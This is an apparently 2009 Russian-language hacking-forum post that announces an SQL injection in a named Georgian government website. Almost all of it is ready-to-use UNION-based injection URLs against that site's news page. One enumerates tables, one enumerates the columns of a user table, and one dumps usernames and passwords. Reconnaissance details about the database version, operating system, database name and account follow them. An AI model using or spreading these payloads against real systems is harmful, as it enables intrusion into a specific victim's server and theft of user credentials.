Показать сообщение отдельно

  #6  
Старый 21.04.2009, 23:57
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами: 9093390

Репутация: 94
По умолчанию

Скуля на http://www.eu-integration.gov.ge

Список таблиц.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(table_name+as+ binary)+from+information_schema.tables+--+

Поля таблицы user.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(column_name+as +binary)+from+information_schema.columns+where+tab le_name=0x75736572+--+

Список пользователей-паролей.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,concat_ws(0x3a,cast (username+as+binary),cast(password+as+binary))+fro m+user+--+

Версия БД: 5.0.77
Ось: portbld-freebsd6.3
Имя БД: euinteg_euinteg
Рабочая папка БД: /var/db/mysql/
Пользователь БД: euinteg_euint@localhost

Прав на чтения файлов нет, доступа к mysql.user нет.
 
Ответить с цитированием